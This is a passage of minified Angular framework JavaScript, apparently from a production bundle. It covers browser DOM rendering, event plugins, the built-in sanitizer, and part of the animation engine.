a=vP(this.window.history)||vP(Object.getPrototypeOf(this.window.history));return!(!a||!a.writable&&!a.set)}catch(a){return!1}}supportsScrolling(){try{return!!this.window&&!!this.window.scrollTo&&"pageXOffset"in this.window}catch(a){return!1}}}function vP(t){return Object.getOwnPropertyDescriptor(t,"scrollRestoration")}class AP{}class p6 extends class Mse extends class Voe{}{constructor(){super(...arguments),this.supportsDOMEvents=!0}}{static makeCurrent(){!function Foe(t){Bv||(Bv=t)}(new p6)}onAndCancel(a,e,i){return a.addEventListener(e,i,!1),()=>{a.removeEventListener(e,i,!1)}}dispatchEvent(a,e){a.dispatchEvent(e)}remove(a){a.parentNode&&a.parentNode.removeChild(a)}createElement(a,e){return(e=e||this.getDefaultDocument()).createElement(a)}createHtmlDocument(){return document.implementation.createHTMLDocument("fakeTitle")}getDefaultDocument(){return document}isElementNode(a){return a.nodeType===Node.ELEMENT_NODE}isShadowRoot(a){return a instanceof DocumentFragment}getGlobalEventTarget(a,e){return"window"===e?window:"document"===e?a:"body"===e?a.body:null}getBaseHref(a){const e=function vse(){return ry=ry||document.querySelector("base"),ry?ry.getAttribute("href"):null}();return null==e?null:function Ase(t){t4=t4||document.createElement("a"),t4.setAttribute("href",t);const a=t4.pathname;return"/"===a.charAt(0)?a:`/${a}`}(e)}resetBaseElement(){ry=null}getUserAgent(){return window.navigator.userAgent}getCookie(a){return uP(document.cookie,a)}}let t4,ry=null;const xP=new ni("TRANSITION_ID"),Ese=[{provide:Nv,useFactory:function Tse(t,a,e){return()=>{e.get(Lv).donePromise.then(()=>{const i=su(),n=a.querySelectorAll(`style[ng-transition="${t}"]`);for(let r=0;r<n.length;r++)i.remove(n[r])})}},deps:[xP,ga,Ko],multi:!0}];let xse=(()=>{class t{build(){return new XMLHttpRequest}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const a4=new ni("EventManagerPlugins");let n4=(()=>{class t{constructor(e,i){this._zone=i,this._eventNameToPlugin=new Map,e.forEach(n=>n.manager=this),this._plugins=e.slice().reverse()}addEventListener(e,i,n){return this._findPluginFor(i).addEventListener(e,i,n)}addGlobalEventListener(e,i,n){return this._findPluginFor(i).addGlobalEventListener(e,i,n)}getZone(){return this._zone}_findPluginFor(e){const i=this._eventNameToPlugin.get(e);if(i)return i;const n=this._plugins;for(let r=0;r<n.length;r++){const c=n[r];if(c.supports(e))return this._eventNameToPlugin.set(e,c),c}throw new Error(`No event manager plugin found for event ${e}`)}}return t.\u0275fac=function(e){return new(e||t)(At(a4),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class wP{constructor(a){this._doc=a}addGlobalEventListener(a,e,i){const n=su().getGlobalEventTarget(this._doc,a);if(!n)throw new Error(`Unsupported event target ${n} for event ${e}`);return this.addEventListener(n,e,i)}}let IP=(()=>{class t{constructor(){this._stylesSet=new Set}addStyles(e){const i=new Set;e.forEach(n=>{this._stylesSet.has(n)||(this._stylesSet.add(n),i.add(n))}),this.onStylesAdded(i)}onStylesAdded(e){}getAllStyles(){return Array.from(this._stylesSet)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),sy=(()=>{class t extends IP{constructor(e){super(),this._doc=e,this._hostNodes=new Map,this._hostNodes.set(e.head,[])}_addStylesToHost(e,i,n){e.forEach(r=>{const c=this._doc.createElement("style");c.textContent=r,n.push(i.appendChild(c))})}addHost(e){const i=[];this._addStylesToHost(this._stylesSet,e,i),this._hostNodes.set(e,i)}removeHost(e){const i=this._hostNodes.get(e);i&&i.forEach(RP),this._hostNodes.delete(e)}onStylesAdded(e){this._hostNodes.forEach((i,n)=>{this._addStylesToHost(e,n,i)})}ngOnDestroy(){this._hostNodes.forEach(e=>e.forEach(RP))}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function RP(t){su().remove(t)}const _6={svg:"http://www.w3.org/2000/svg",xhtml:"http://www.w3.org/1999/xhtml",xlink:"http://www.w3.org/1999/xlink",xml:"http://www.w3.org/XML/1998/namespace",xmlns:"http://www.w3.org/2000/xmlns/",math:"http://www.w3.org/1998/MathML/"},g6=/%COMP%/g;function o4(t,a,e){for(let i=0;i<a.length;i++){let n=a[i];Array.isArray(n)?o4(t,n,e):(n=n.replace(g6,t),e.push(n))}return e}function PP(t){return a=>{if("__ngUnwrap__"===a)return t;!1===t(a)&&(a.preventDefault(),a.returnValue=!1)}}let r4=(()=>{class t{constructor(e,i,n){this.eventManager=e,this.sharedStylesHost=i,this.appId=n,this.rendererByCompId=new Map,this.defaultRenderer=new C6(e)}createRenderer(e,i){if(!e||!i)return this.defaultRenderer;switch(i.encapsulation){case dc.Emulated:{let n=this.rendererByCompId.get(i.id);return n||(n=new Pse(this.eventManager,this.sharedStylesHost,i,this.appId),this.rendererByCompId.set(i.id,n)),n.applyToHost(e),n}case 1:case dc.ShadowDom:return new Ose(this.eventManager,this.sharedStylesHost,e,i);default:if(!this.rendererByCompId.has(i.id)){const n=o4(i.id,i.styles,[]);this.sharedStylesHost.addStyles(n),this.rendererByCompId.set(i.id,this.defaultRenderer)}return this.defaultRenderer}}begin(){}end(){}}return t.\u0275fac=function(e){return new(e||t)(At(n4),At(sy),At(h1))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class C6{constructor(a){this.eventManager=a,this.data=Object.create(null),this.destroyNode=null}destroy(){}createElement(a,e){return e?document.createElementNS(_6[e]||e,a):document.createElement(a)}createComment(a){return document.createComment(a)}createText(a){return document.createTextNode(a)}appendChild(a,e){(NP(a)?a.content:a).appendChild(e)}insertBefore(a,e,i){a&&(NP(a)?a.content:a).insertBefore(e,i)}removeChild(a,e){a&&a.removeChild(e)}selectRootElement(a,e){let i="string"==typeof a?document.querySelector(a):a;if(!i)throw new Error(`The selector "${a}" did not match any elements`);return e||(i.textContent=""),i}parentNode(a){return a.parentNode}nextSibling(a){return a.nextSibling}setAttribute(a,e,i,n){if(n){e=n+":"+e;const r=_6[n];r?a.setAttributeNS(r,e,i):a.setAttribute(e,i)}else a.setAttribute(e,i)}removeAttribute(a,e,i){if(i){const n=_6[i];n?a.removeAttributeNS(n,e):a.removeAttribute(`${i}:${e}`)}else a.removeAttribute(e)}addClass(a,e){a.classList.add(e)}removeClass(a,e){a.classList.remove(e)}setStyle(a,e,i,n){n&(vl.DashCase|vl.Important)?a.style.setProperty(e,i,n&vl.Important?"important":""):a.style[e]=i}removeStyle(a,e,i){i&vl.DashCase?a.style.removeProperty(e):a.style[e]=""}setProperty(a,e,i){a[e]=i}setValue(a,e){a.nodeValue=e}listen(a,e,i){return"string"==typeof a?this.eventManager.addGlobalEventListener(a,e,PP(i)):this.eventManager.addEventListener(a,e,PP(i))}}function NP(t){return"TEMPLATE"===t.tagName&&void 0!==t.content}class Pse extends C6{constructor(a,e,i,n){super(a),this.component=i;const r=o4(n+"-"+i.id,i.styles,[]);e.addStyles(r),this.contentAttr=function Rse(t){return"_ngcontent-%COMP%".replace(g6,t)}(n+"-"+i.id),this.hostAttr=function Sse(t){return"_nghost-%COMP%".replace(g6,t)}(n+"-"+i.id)}applyToHost(a){super.setAttribute(a,this.hostAttr,"")}createElement(a,e){const i=super.createElement(a,e);return super.setAttribute(i,this.contentAttr,""),i}}class Ose extends C6{constructor(a,e,i,n){super(a),this.sharedStylesHost=e,this.hostEl=i,this.shadowRoot=i.attachShadow({mode:"open"}),this.sharedStylesHost.addHost(this.shadowRoot);const r=o4(n.id,n.styles,[]);for(let c=0;c<r.length;c++){const d=document.createElement("style");d.textContent=r[c],this.shadowRoot.appendChild(d)}}nodeOrShadowRoot(a){return a===this.hostEl?this.shadowRoot:a}destroy(){this.sharedStylesHost.removeHost(this.shadowRoot)}appendChild(a,e){return super.appendChild(this.nodeOrShadowRoot(a),e)}insertBefore(a,e,i){return super.insertBefore(this.nodeOrShadowRoot(a),e,i)}removeChild(a,e){return super.removeChild(this.nodeOrShadowRoot(a),e)}parentNode(a){return this.nodeOrShadowRoot(super.parentNode(this.nodeOrShadowRoot(a)))}}let Nse=(()=>{class t extends wP{constructor(e){super(e)}supports(e){return!0}addEventListener(e,i,n){return e.addEventListener(i,n,!1),()=>this.removeEventListener(e,i,n)}removeEventListener(e,i,n){return e.removeEventListener(i,n)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const LP=["alt","control","meta","shift"],Lse={"\b":"Backspace","\t":"Tab","\x7f":"Delete","\x1b":"Escape",Del:"Delete",Esc:"Escape",Left:"ArrowLeft",Right:"ArrowRight",Up:"ArrowUp",Down:"ArrowDown",Menu:"ContextMenu",Scroll:"ScrollLock",Win:"OS"},zse={alt:t=>t.altKey,control:t=>t.ctrlKey,meta:t=>t.metaKey,shift:t=>t.shiftKey};let Wse=(()=>{class t extends wP{constructor(e){super(e)}supports(e){return null!=t.parseEventName(e)}addEventListener(e,i,n){const r=t.parseEventName(i),c=t.eventCallback(r.fullKey,n,this.manager.getZone());return this.manager.getZone().runOutsideAngular(()=>su().onAndCancel(e,r.domEventName,c))}static parseEventName(e){const i=e.toLowerCase().split("."),n=i.shift();if(0===i.length||"keydown"!==n&&"keyup"!==n)return null;const r=t._normalizeKey(i.pop());let c="",d=i.indexOf("code");if(d>-1&&(i.splice(d,1),c="code."),LP.forEach(k=>{const q=i.indexOf(k);q>-1&&(i.splice(q,1),c+=k+".")}),c+=r,0!=i.length||0===r.length)return null;const T={};return T.domEventName=n,T.fullKey=c,T}static matchEventFullKeyCode(e,i){let n=Lse[e.key]||e.key,r="";return i.indexOf("code.")>-1&&(n=e.code,r="code."),!(null==n||!n)&&(n=n.toLowerCase()," "===n?n="space":"."===n&&(n="dot"),LP.forEach(c=>{c!==n&&(0,zse[c])(e)&&(r+=c+".")}),r+=n,r===i)}static eventCallback(e,i,n){return r=>{t.matchEventFullKeyCode(r,e)&&n.runGuarded(()=>i(r))}}static _normalizeKey(e){return"esc"===e?"escape":e}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const Hse=P9(Loe,"browser",[{provide:lm,useValue:MP},{provide:A9,useValue:function Fse(){p6.makeCurrent()},multi:!0},{provide:ga,useFactory:function Bse(){return function aE(t){H_=t}(document),document},deps:[]}]),FP=new ni(""),VP=[{provide:zv,useClass:class Dse{addToWindow(a){vo.getAngularTestability=(i,n=!0)=>{const r=a.findTestabilityInTree(i,n);if(null==r)throw new Error("Could not find testability for element.");return r},vo.getAllAngularTestabilities=()=>a.getAllTestabilities(),vo.getAllAngularRootElements=()=>a.getAllRootElements(),vo.frameworkStabilizers||(vo.frameworkStabilizers=[]),vo.frameworkStabilizers.push(i=>{const n=vo.getAllAngularTestabilities();let r=n.length,c=!1;const d=function(T){c=c||T,r--,0==r&&i(c)};n.forEach(function(T){T.whenStable(d)})})}findTestabilityInTree(a,e,i){if(null==e)return null;const n=a.getTestability(e);return null!=n?n:i?su().isShadowRoot(e)?this.findTestabilityInTree(a,e.host,!0):this.findTestabilityInTree(a,e.parentElement,!0):null}},deps:[]},{provide:I9,useClass:HD,deps:[qi,UD,zv]},{provide:HD,useClass:HD,deps:[qi,UD,zv]}],BP=[{provide:dt,useValue:"root"},{provide:yh,useFactory:function Vse(){return new yh},deps:[]},{provide:a4,useClass:Nse,multi:!0,deps:[ga,qi,lm]},{provide:a4,useClass:Wse,multi:!0,deps:[ga]},{provide:r4,useClass:r4,deps:[n4,sy,h1]},{provide:qs,useExisting:r4},{provide:IP,useExisting:sy},{provide:sy,useClass:sy,deps:[ga]},{provide:n4,useClass:n4,deps:[a4,qi]},{provide:AP,useClass:xse,deps:[]},[]];let HP=(()=>{class t{constructor(e){}static withServerTransition(e){return{ngModule:t,providers:[{provide:h1,useValue:e.appId},{provide:xP,useExisting:h1},Ese]}}}return t.\u0275fac=function(e){return new(e||t)(At(FP,12))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[...BP,...VP],imports:[rn,zoe]}),t})(),UP=(()=>{class t{constructor(e){this._doc=e}getTitle(){return this._doc.title}setTitle(e){this._doc.title=e||""}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new e:function qse(){return new UP(At(ga))}(),i},providedIn:"root"}),t})();"undefined"!=typeof window&&window;let cy=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new(e||t):At(jP),i},providedIn:"root"}),t})(),jP=(()=>{class t extends cy{constructor(e){super(),this._doc=e}sanitize(e,i){if(null==i)return null;switch(e){case oo.NONE:return i;case oo.HTML:return Fi(i,"HTML")?Hc(i):iv(this._doc,String(i)).toString();case oo.STYLE:return Fi(i,"Style")?Hc(i):i;case oo.SCRIPT:if(Fi(i,"Script"))return Hc(i);throw new Error("unsafe value used in a script context");case oo.URL:return Fi(i,"URL")?Hc(i):B0(String(i));case oo.RESOURCE_URL:if(Fi(i,"ResourceURL"))return Hc(i);throw new Error("unsafe value used in a resource URL context (see https://g.co/ng/security#xss)");default:throw new Error(`Unexpected SecurityContext ${e} (see https://g.co/ng/security#xss)`)}}bypassSecurityTrustHtml(e){return function W0(t){return new oE(t)}(e)}bypassSecurityTrustStyle(e){return function bl(t){return new rE(t)}(e)}bypassSecurityTrustScript(e){return function cE(t){return new IC(t)}(e)}bypassSecurityTrustUrl(e){return function Io(t){return new sE(t)}(e)}bypassSecurityTrustResourceUrl(e){return function hr(t){return new RC(t)}(e)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new e:function Yse(t){return new jP(t.get(ga))}(At(Ko)),i},providedIn:"root"}),t})();class QP{}const wh="*";function nr(t,a){return{type:7,name:t,definitions:a,options:{}}}function En(t,a=null){return{type:4,styles:a,timings:t}}function $P(t,a=null){return{type:3,steps:t,options:a}}function KP(t,a=null){return{type:2,steps:t,options:a}}function zi(t){return{type:6,styles:t,offset:null}}function sn(t,a,e){return{type:0,name:t,styles:a,options:e}}function ng(t){return{type:5,steps:t}}function gn(t,a,e=null){return{type:1,expr:t,animation:a,options:e}}function s4(t=null){return{type:9,options:t}}function c4(t,a,e=null){return{type:11,selector:t,animation:a,options:e}}function XP(t){Promise.resolve().then(t)}class ly{constructor(a=0,e=0){this._onDoneFns=[],this._onStartFns=[],this._onDestroyFns=[],this._originalOnDoneFns=[],this._originalOnStartFns=[],this._started=!1,this._destroyed=!1,this._finished=!1,this._position=0,this.parentPlayer=null,this.totalTime=a+e}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}onStart(a){this._originalOnStartFns.push(a),this._onStartFns.push(a)}onDone(a){this._originalOnDoneFns.push(a),this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}hasStarted(){return this._started}init(){}play(){this.hasStarted()||(this._onStart(),this.triggerMicrotask()),this._started=!0}triggerMicrotask(){XP(()=>this._onFinish())}_onStart(){this._onStartFns.forEach(a=>a()),this._onStartFns=[]}pause(){}restart(){}finish(){this._onFinish()}destroy(){this._destroyed||(this._destroyed=!0,this.hasStarted()||this._onStart(),this.finish(),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}reset(){this._started=!1,this._finished=!1,this._onStartFns=this._originalOnStartFns,this._onDoneFns=this._originalOnDoneFns}setPosition(a){this._position=this.totalTime?a*this.totalTime:1}getPosition(){return this.totalTime?this._position/this.totalTime:1}triggerCallback(a){const e="start"==a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}class YP{constructor(a){this._onDoneFns=[],this._onStartFns=[],this._finished=!1,this._started=!1,this._destroyed=!1,this._onDestroyFns=[],this.parentPlayer=null,this.totalTime=0,this.players=a;let e=0,i=0,n=0;const r=this.players.length;0==r?XP(()=>this._onFinish()):this.players.forEach(c=>{c.onDone(()=>{++e==r&&this._onFinish()}),c.onDestroy(()=>{++i==r&&this._onDestroy()}),c.onStart(()=>{++n==r&&this._onStart()})}),this.totalTime=this.players.reduce((c,d)=>Math.max(c,d.totalTime),0)}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}init(){this.players.forEach(a=>a.init())}onStart(a){this._onStartFns.push(a)}_onStart(){this.hasStarted()||(this._started=!0,this._onStartFns.forEach(a=>a()),this._onStartFns=[])}onDone(a){this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}hasStarted(){return this._started}play(){this.parentPlayer||this.init(),this._onStart(),this.players.forEach(a=>a.play())}pause(){this.players.forEach(a=>a.pause())}restart(){this.players.forEach(a=>a.restart())}finish(){this._onFinish(),this.players.forEach(a=>a.finish())}destroy(){this._onDestroy()}_onDestroy(){this._destroyed||(this._destroyed=!0,this._onFinish(),this.players.forEach(a=>a.destroy()),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}reset(){this.players.forEach(a=>a.reset()),this._destroyed=!1,this._finished=!1,this._started=!1}setPosition(a){const e=a*this.totalTime;this.players.forEach(i=>{const n=i.totalTime?Math.min(1,e/i.totalTime):1;i.setPosition(n)})}getPosition(){const a=this.players.reduce((e,i)=>null===e||i.totalTime>e.totalTime?i:e,null);return null!=a?a.getPosition():0}beforeDestroy(){this.players.forEach(a=>{a.beforeDestroy&&a.beforeDestroy()})}triggerCallback(a){const e="start"==a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}var JP=de(5486);function ZP(t){return new gi(3e3,!1)}function Pce(){return"undefined"!=typeof window&&void 0!==window.document}function v6(){return void 0!==JP&&"[object process]"==={}.toString.call(JP)}function ep(t){switch(t.length){case 0:return new ly;case 1:return t[0];default:return new YP(t)}}function eO(t,a,e,i,n=new Map,r=new Map){const c=[],d=[];let T=-1,k=null;if(i.forEach(q=>{const Y=q.get("offset"),te=Y==T,pe=te&&k||new Map;q.forEach((Re,Fe)=>{let Ne=Fe,et=Re;if("offset"!==Fe)switch(Ne=a.normalizePropertyName(Ne,c),et){case"!":et=n.get(Fe);break;case wh:et=r.get(Fe);break;default:et=a.normalizeStyleValue(Fe,Ne,et,c)}pe.set(Ne,et)}),te||d.push(pe),k=pe,T=Y}),c.length)throw function Mce(t){return new gi(3502,!1)}();return d}function A6(t,a,e,i){switch(a){case"start":t.onStart(()=>i(e&&T6(e,"start",t)));break;case"done":t.onDone(()=>i(e&&T6(e,"done",t)));break;case"destroy":t.onDestroy(()=>i(e&&T6(e,"destroy",t)))}}function T6(t,a,e){const i=e.totalTime,r=E6(t.element,t.triggerName,t.fromState,t.toState,a||t.phaseName,null==i?t.totalTime:i,!!e.disabled),c=t._data;return null!=c&&(r._data=c),r}function E6(t,a,e,i,n="",r=0,c){return{element:t,triggerName:a,fromState:e,toState:i,phaseName:n,totalTime:r,disabled:!!c}}function Gl(t,a,e){let i=t.get(a);return i||t.set(a,i=e),i}function tO(t){const a=t.indexOf(":");return[t.substring(1,a),t.slice(a+1)]}let D6=(t,a)=>!1,iO=(t,a,e)=>[],aO=null;function x6(t){const a=t.parentNode||t.host;return a===aO?null:a}(v6()||"undefined"!=typeof Element)&&(Pce()?(aO=(()=>document.documentElement)(),D6=(t,a)=>{for(;a;){if(a===t)return!0;a=x6(a)}return!1}):D6=(t,a)=>t.contains(a),iO=(t,a,e)=>{if(e)return Array.from(t.querySelectorAll(a));const i=t.querySelector(a);return i?[i]:[]});let og=null,nO=!1;const oO=D6,rO=iO;let sO=(()=>{class t{validateStyleProperty(e){return function Nce(t){og||(og=function Lce(){return"undefined"!=typeof document?document.body:null}()||{},nO=!!og.style&&"WebkitAppearance"in og.style);let a=!0;return og.style&&!function Oce(t){return"ebkit"==t.substring(1,6)}(t)&&(a=t in og.style,!a&&nO&&(a="Webkit"+t.charAt(0).toUpperCase()+t.slice(1)in og.style)),a}(e)}matchesElement(e,i){return!1}containsElement(e,i){return oO(e,i)}getParentElement(e){return x6(e)}query(e,i,n){return rO(e,i,n)}computeStyle(e,i,n){return n||""}animate(e,i,n,r,c,d=[],T){return new ly(n,r)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),w6=(()=>{class t{}return t.NOOP=new sO,t})();const I6="ng-enter",l4="ng-leave",d4="ng-trigger",m4=".ng-trigger",lO="ng-animating",R6=".ng-animating";function Ih(t){if("number"==typeof t)return t;const a=t.match(/^(-?[\.\d]+)(m?s)/);return!a||a.length<2?0:S6(parseFloat(a[1]),a[2])}function S6(t,a){return"s"===a?1e3*t:t}function u4(t,a,e){return t.hasOwnProperty("duration")?t:function Fce(t,a,e){let n,r=0,c="";if("string"==typeof t){const d=t.match(/^(-?[\.\d]+)(m?s)(?:\s+(-?[\.\d]+)(m?s))?(?:\s+([-a-z]+(?:\(.+?\))?))?$/i);if(null===d)return a.push(ZP()),{duration:0,delay:0,easing:""};n=S6(parseFloat(d[1]),d[2]);const T=d[3];null!=T&&(r=S6(parseFloat(T),d[4]));const k=d[5];k&&(c=k)}else n=t;if(!e){let d=!1,T=a.length;n<0&&(a.push(function Zse(){return new gi(3100,!1)}()),d=!0),r<0&&(a.push(function ece(){return new gi(3101,!1)}()),d=!0),d&&a.splice(T,0,ZP())}return{duration:n,delay:r,easing:c}}(t,a,e)}function dy(t,a={}){return Object.keys(t).forEach(e=>{a[e]=t[e]}),a}function dO(t){const a=new Map;return Object.keys(t).forEach(e=>{a.set(e,t[e])}),a}function tp(t,a=new Map,e){if(e)for(let[i,n]of e)a.set(i,n);for(let[i,n]of t)a.set(i,n);return a}function uO(t,a,e){return e?a+":"+e+";":""}function hO(t){let a="";for(let e=0;e<t.style.length;e++){const i=t.style.item(e);a+=uO(0,i,t.style.getPropertyValue(i))}for(const e in t.style)t.style.hasOwnProperty(e)&&!e.startsWith("_")&&(a+=uO(0,Uce(e),t.style[e]));t.setAttribute("style",a)}function cu(t,a,e){t.style&&(a.forEach((i,n)=>{const r=P6(n);e&&!e.has(n)&&e.set(n,t.style[r]),t.style[r]=i}),v6()&&hO(t))}function rg(t,a){t.style&&(a.forEach((e,i)=>{const n=P6(i);t.style[n]=""}),v6()&&hO(t))}function my(t){return Array.isArray(t)?1==t.length?t[0]:KP(t):t}const k6=new RegExp("{{\\s*(.+?)\\s*}}","g");function fO(t){let a=[];if("string"==typeof t){let e;for(;e=k6.exec(t);)a.push(e[1]);k6.lastIndex=0}return a}function uy(t,a,e){const i=t.toString(),n=i.replace(k6,(r,c)=>{let d=a[c];return null==d&&(e.push(function ice(t){return new gi(3003,!1)}()),d=""),d.toString()});return n==i?t:n}function h4(t){const a=[];let e=t.next();for(;!e.done;)a.push(e.value),e=t.next();return a}const Hce=/-+([a-z0-9])/g;function P6(t){return t.replace(Hce,(...a)=>a[1].toUpperCase())}function Uce(t){return t.replace(/([a-z])([A-Z])/g,"$1-$2").toLowerCase()}function jl(t,a,e){switch(a.type){case 7:return t.visitTrigger(a,e);case 0:return t.visitState(a,e);case 1:return t.visitTransition(a,e);case 2:return t.visitSequence(a,e);case 3:return t.visitGroup(a,e);case 4:return t.visitAnimate(a,e);case 5:return t.visitKeyframes(a,e);case 6:return t.visitStyle(a,e);case 8:return t.visitReference(a,e);case 9:return t.visitAnimateChild(a,e);case 10:return t.visitAnimateRef(a,e);case 11:return t.visitQuery(a,e);case 12:return t.visitStagger(a,e);default:throw function ace(t){return new gi(3004,!1)}()}}function pO(t,a){return window.getComputedStyle(t)[a]}function Kce(t,a){const e=[];return"string"==typeof t?t.split(/\s*,\s*/).forEach(i=>function Xce(t,a,e){if(":"==t[0]){const T=function Yce(t,a){switch(t){case":enter":return"void => *";case":leave":return"* => void";case":increment":return(e,i)=>parseFloat(i)>parseFloat(e);case":decrement":return(e,i)=>parseFloat(i)<parseFloat(e);default:return a.push(function gce(t){return new gi(3016,!1)}()),"* => *"}}(t,e);if("function"==typeof T)return void a.push(T);t=T}const i=t.match(/^(\*|[-\w]+)\s*(<?[=-]>)\s*(\*|[-\w]+)$/);if(null==i||i.length<4)return e.push(function _ce(t){return new gi(3015,!1)}()),a;const n=i[1],r=i[2],c=i[3];a.push(_O(n,c));"<"==r[0]&&!("*"==n&&"*"==c)&&a.push(_O(c,n))}(i,e,a)):e.push(t),e}const g4=new Set(["true","1"]),C4=new Set(["false","0"]);function _O(t,a){const e=g4.has(t)||C4.has(t),i=g4.has(a)||C4.has(a);return(n,r)=>{let c="*"==t||t==n,d="*"==a||a==r;return!c&&e&&"boolean"==typeof n&&(c=n?g4.has(t):C4.has(t)),!d&&i&&"boolean"==typeof r&&(d=r?g4.has(a):C4.has(a)),c&&d}}const Jce=new RegExp("s*:selfs*,?","g");function O6(t,a,e,i){return new Zce(t).build(a,e,i)}class Zce{constructor(a){this._driver=a}build(a,e,i){const n=new ile(e);return this._resetContextStyleTimingState(n),jl(this,my(a),n)}_resetContextStyleTimingState(a){a.currentQuerySelector="",a.collectedStyles=new Map,a.collectedStyles.set("",new Map),a.currentTime=0}visitTrigger(a,e){let i=e.queryCount=0,n=e.depCount=0;const r=[],c=[];return"@"==a.name.charAt(0)&&e.errors.push(function oce(){return new gi(3006,!1)}()),a.definitions.forEach(d=>{if(this._resetContextStyleTimingState(e),0==d.type){const T=d,k=T.name;k.toString().split(/\s*,\s*/).forEach(q=>{T.name=q,r.push(this.visitState(T,e))}),T.name=k}else if(1==d.type){const T=this.visitTransition(d,e);i+=T.queryCount,n+=T.depCount,c.push(T)}else e.errors.push(function rce(){return new gi(3007,!1)}())}),{type:7,name:a.name,states:r,transitions:c,queryCount:i,depCount:n,options:null}}visitState(a,e){const i=this.visitStyle(a.styles,e),n=a.options&&a.options.params||null;if(i.containsDynamicStyles){const r=new Set,c=n||{};i.styles.forEach(d=>{d instanceof Map&&d.forEach(T=>{fO(T).forEach(k=>{c.hasOwnProperty(k)||r.add(k)})})}),r.size&&(h4(r.values()),e.errors.push(function sce(t,a){return new gi(3008,!1)}()))}return{type:0,name:a.name,style:i,options:n?{params:n}:null}}visitTransition(a,e){e.queryCount=0,e.depCount=0;const i=jl(this,my(a.animation),e);return{type:1,matchers:Kce(a.expr,e.errors),animation:i,queryCount:e.queryCount,depCount:e.depCount,options:sg(a.options)}}visitSequence(a,e){return{type:2,steps:a.steps.map(i=>jl(this,i,e)),options:sg(a.options)}}visitGroup(a,e){const i=e.currentTime;let n=0;const r=a.steps.map(c=>{e.currentTime=i;const d=jl(this,c,e);return n=Math.max(n,e.currentTime),d});return e.currentTime=n,{type:3,steps:r,options:sg(a.options)}}visitAnimate(a,e){const i=function nle(t,a){if(t.hasOwnProperty("duration"))return t;if("number"==typeof t)return N6(u4(t,a).duration,0,"");const e=t;if(e.split(/\s+/).some(r=>"{"==r.charAt(0)&&"{"==r.charAt(1))){const r=N6(0,0,"");return r.dynamic=!0,r.strValue=e,r}const n=u4(e,a);return N6(n.duration,n.delay,n.easing)}(a.timings,e.errors);e.currentAnimateTimings=i;let n,r=a.styles?a.styles:zi({});if(5==r.type)n=this.visitKeyframes(r,e);else{let c=a.styles,d=!1;if(!c){d=!0;const k={};i.easing&&(k.easing=i.easing),c=zi(k)}e.currentTime+=i.duration+i.delay;const T=this.visitStyle(c,e);T.isEmptyStep=d,n=T}return e.currentAnimateTimings=null,{type:4,timings:i,style:n,options:null}}visitStyle(a,e){const i=this._makeStyleAst(a,e);return this._validateStyleAst(i,e),i}_makeStyleAst(a,e){const i=[],n=Array.isArray(a.styles)?a.styles:[a.styles];for(let d of n)"string"==typeof d?d===wh?i.push(d):e.errors.push(new gi(3002,!1)):i.push(dO(d));let r=!1,c=null;return i.forEach(d=>{if(d instanceof Map&&(d.has("easing")&&(c=d.get("easing"),d.delete("easing")),!r))for(let T of d.values())if(T.toString().indexOf("{{")>=0){r=!0;break}}),{type:6,styles:i,easing:c,offset:a.offset,containsDynamicStyles:r,options:null}}_validateStyleAst(a,e){const i=e.currentAnimateTimings;let n=e.currentTime,r=e.currentTime;i&&r>0&&(r-=i.duration+i.delay),a.styles.forEach(c=>{"string"!=typeof c&&c.forEach((d,T)=>{const k=e.collectedStyles.get(e.currentQuerySelector),q=k.get(T);let Y=!0;q&&(r!=n&&r>=q.startTime&&n<=q.endTime&&(e.errors.push(function lce(t,a,e,i,n){return new gi(3010,!1)}()),Y=!1),r=q.startTime),Y&&k.set(T,{startTime:r,endTime:n}),e.options&&function Bce(t,a,e){const i=a.params||{},n=fO(t);n.length&&n.forEach(r=>{i.hasOwnProperty(r)||e.push(function tce(t){return new gi(3001,!1)}())})}(d,e.options,e.errors)})})}visitKeyframes(a,e){const i={type:5,styles:[],options:null};if(!e.currentAnimateTimings)return e.errors.push(function dce(){return new gi(3011,!1)}()),i;let r=0;const c=[];let d=!1,T=!1,k=0;const q=a.steps.map(et=>{const ut=this._makeStyleAst(et,e);let Ze=null!=ut.offset?ut.offset:function ale(t){if("string"==typeof t)return null;let a=null;if(Array.isArray(t))t.forEach(e=>{if(e instanceof Map&&e.has("offset")){const i=e;a=parseFloat(i.get("offset")),i.delete("offset")}});else if(t instanceof Map&&t.has("offset")){const e=t;a=parseFloat(e.get("offset")),e.delete("offset")}return a}(ut.styles),yt=0;return null!=Ze&&(r++,yt=ut.offset=Ze),T=T||yt<0||yt>1,d=d||yt<k,k=yt,c.push(yt),ut});T&&e.errors.push(function mce(){return new gi(3012,!1)}()),d&&e.errors.push(function uce(){return new gi(3200,!1)}());const Y=a.steps.length;let te=0;r>0&&r<Y?e.errors.push(function hce(){return new 